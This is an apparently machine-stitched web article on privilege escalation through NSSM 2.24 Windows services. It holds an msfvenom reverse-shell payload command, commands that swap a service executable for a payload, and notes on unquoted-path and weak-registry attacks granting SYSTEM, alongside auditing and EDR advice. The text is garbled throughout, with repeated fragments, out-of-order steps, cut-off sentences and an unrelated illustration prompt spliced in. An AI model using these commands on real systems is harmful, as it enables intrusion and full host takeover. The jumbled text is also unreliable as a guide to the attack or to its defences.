An attacker changes the Application string value within the registry to point to a malicious payload (e.g., cmd.exe or a reverse shell). When the service cycles, the payload runs as SYSTEM . 3. Unquoted Service Paths
Disclaimer: This breakdown is for educational purposes and authorized penetration testing only. Step 1: Enumeration & Identification
move "C:\Program Files\Amateur Service\app.exe" "C:\Program Files\Amateur Service\app.exe.bak" move service.exe "C:\Program Files\Amateur Service\app.exe" Use code with caution.
Tools like icacls.exe are foundational here. If the output reveals that BUILTIN\Users or Everyone has (F) Full Control or (M) Modify permissions on the folder, the directory is vulnerable: icacls "C:\Path\To\NSSM\Service" Use code with caution. Step 3: Payload Generation & Replacement nssm224 privilege escalation updated
If they lack service control privileges, they simply wait for an administrative reboot or a system update to force a power cycle. Once triggered, the reverse shell executes, granting the attacker an interactive command prompt running as NT AUTHORITY\SYSTEM . Updated Defense and Remediation Guide
Enable auditing for HKLM\SYSTEM\CurrentControlSet\Services\ and alert on modifications to the Parameters subkey made by non-administrative users.
Enable Windows Event Auditing to track changes to services and registry keys. New service was installed. An attacker changes the Application string value within
Shadow Transit Medium: Digital Illustration / Concept Art Subject: A visual interpretation of the internal system state during a specific privilege escalation event.
Configure Endpoint Detection and Response (EDR) agents to block any write operations to .exe and .dll files inside production application paths by non-admin identities. Conclusion
If the path to the NSSM executable contains spaces and is not enclosed in quotation marks, Windows can be tricked. Unquoted Service Paths Disclaimer: This breakdown is for
Defenders can spot NSSM privilege escalation attempts by monitoring specific artifacts:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f exe -o payload.exe Use code with caution. Step 3: Triggering Execution
If exploiting , the attacker renames the original executable and places their payload.exe in its place using the original filename.
If the path to the NSSM executable or the application binary contains spaces and is not enclosed in quotation marks (e.g., C:\Program Files\Service Folder\nssm.exe ), Windows will attempt to execute files at the spaces. An attacker with write access to C:\ or C:\Program Files\ can drop a malicious file named Program.exe to intercept the service launch. 3. Weak Registry Permissions
If they lack service control permissions, they may wait for a system reboot if the service startup type is set to Automatic . Once executed, the attacker receives a shell with SYSTEM privileges on their listener. Updated Mitigation and Defense Strategies